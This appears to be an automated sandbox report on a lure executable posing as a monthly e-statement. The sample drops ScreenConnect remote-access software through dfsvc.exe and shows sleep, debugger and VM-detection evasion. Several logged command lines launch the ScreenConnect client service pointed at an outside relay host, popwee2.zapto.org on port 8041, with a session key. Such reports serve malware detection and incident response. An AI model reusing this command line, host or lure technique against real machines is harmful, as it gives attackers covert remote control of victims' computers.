                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeAPI coverage: 3.1 %
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe TID: 6132Thread sleep time: -40000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5732Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4092Thread sleep time: -151950s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4092Thread sleep time: -280150s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5732Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\svchost.exe TID: 5296Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\svchost.exe TID: 5296Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe TID: 7460Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe TID: 7504Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeLast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_00F24A4B FindFirstFileExA,0_2_00F24A4B
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeThread delayed: delay time: 40000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: Amcache.hve.13.drBinary or memory string: VMware
                  Source: Amcache.hve.13.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.13.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.13.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.13.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.13.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.13.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.13.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: dfsvc.exe, 00000001.00000002.3177545267.000001E8CDF28000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3173633903.000001E8CC340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2920588431.0000019A7EE57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3156571081.000002094E4CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.13.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.13.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.13.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.13.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: svchost.exe, 00000005.00000002.3154598845.000002240C02B000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000009.00000002.3154078820.0000000000AB4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: Amcache.hve.13.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.13.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.13.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: svchost.exe, 00000004.00000002.2920033550.0000019A7D82B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155606324.000002094E45F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                  Source: Amcache.hve.13.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: svchost.exe, 0000000E.00000002.3155699966.000002094E483000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NXTVMWare
                  Source: Amcache.hve.13.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.13.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.13.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.13.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.13.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.13.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.13.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.13.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.13.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.13.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.13.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: dfsvc.exe, 00000001.00000002.3177545267.000001E8CDF28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                  Source: Amcache.hve.13.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
                  Source: Amcache.hve.13.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_00F24573 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F24573
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_00F21000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00F21000
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_00F23677 mov eax, dword ptr fs:[00000030h]0_2_00F23677
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_00F26893 GetProcessHeap,0_2_00F26893
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_00F21493 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00F21493
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_00F24573 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F24573
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_00F2191F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F2191F
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_00F21AAC SetUnhandledExceptionFilter,0_2_00F21AAC
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: ScreenConnect.ClientService.dll.1.dr, ClientService.csReference to suspicious API methods: WindowsExtensions.OpenProcess(processID, (ProcessAccess)33554432)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Newboom%20Session" "1"Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 7160 -ip 7160
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7160 -s 332
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\rh07btxr.ry4\8448b9tm.6zz\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\screenconnect.clientservice.exe" "?e=support&y=guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=bgiaaackaabsu0exaagaaaeaaqcpdljbb2ucjqst7j%2beal4srxbn9fngdmzusse%2fjh%2bnkbeoqfhq%2bcr3lypd1ksb17orwp4zvhy7bt585yzidtesloqjgvuwzeifwaakwkfbshg%2fh8gyvt85w1oivud0hejmjtqedcojxvxpd4ojuqhoqhbbylosnsbfrtp0r040%2bcfkcnslvuf01cnsbcaeyuefrkiz%2b8o0yjwrixe6vdrb5cxn%2bauv36m92%2b6%2fhnc5srzm45hr1fu47wa4rara8onacyafp32je3t2cm7eekmt%2bs6hwkgazmp0vlkbgpw3wnp85fhslyn9uz3eztsbn%2f97cfe2jsav4%2brdgima3na8&r=&i=newboom%20session" "1"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\rh07btxr.ry4\8448b9tm.6zz\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\screenconnect.clientservice.exe" "?e=support&y=guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=bgiaaackaabsu0exaagaaaeaaqcpdljbb2ucjqst7j%2beal4srxbn9fngdmzusse%2fjh%2bnkbeoqfhq%2bcr3lypd1ksb17orwp4zvhy7bt585yzidtesloqjgvuwzeifwaakwkfbshg%2fh8gyvt85w1oivud0hejmjtqedcojxvxpd4ojuqhoqhbbylosnsbfrtp0r040%2bcfkcnslvuf01cnsbcaeyuefrkiz%2b8o0yjwrixe6vdrb5cxn%2bauv36m92%2b6%2fhnc5srzm45hr1fu47wa4rara8onacyafp32je3t2cm7eekmt%2bs6hwkgazmp0vlkbgpw3wnp85fhslyn9uz3eztsbn%2f97cfe2jsav4%2brdgima3na8&r=&i=newboom%20session" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\rh07btxr.ry4\8448b9tm.6zz\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\screenconnect.clientservice.exe" "?e=support&y=guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=bgiaaackaabsu0exaagaaaeaaqcpdljbb2ucjqst7j%2beal4srxbn9fngdmzusse%2fjh%2bnkbeoqfhq%2bcr3lypd1ksb17orwp4zvhy7bt585yzidtesloqjgvuwzeifwaakwkfbshg%2fh8gyvt85w1oivud0hejmjtqedcojxvxpd4ojuqhoqhbbylosnsbfrtp0r040%2bcfkcnslvuf01cnsbcaeyuefrkiz%2b8o0yjwrixe6vdrb5cxn%2bauv36m92%2b6%2fhnc5srzm45hr1fu47wa4rara8onacyafp32je3t2cm7eekmt%2bs6hwkgazmp0vlkbgpw3wnp85fhslyn9uz3eztsbn%2f97cfe2jsav4%2brdgima3na8&r=&i=newboom%20session" "1"Jump to behavior
                  Source: ScreenConnect.WindowsClient.exe, 00000007.00000000.1558755338.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.drBinary or memory string: Progman
                  Source: ScreenConnect.WindowsClient.exe, 00000007.00000000.1558755338.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_00F21BD4 cpuid 0_2_00F21BD4
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.ClientService.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.WindowsBackstageShell.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.WindowsFileManager.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.WindowsClient.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.WindowsBackstageShell.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.WindowsFileManager.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\XY6LGGAR.JME\5G10PGPQ.9DO\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.Windows.dll VolumeInformationJump to behavior
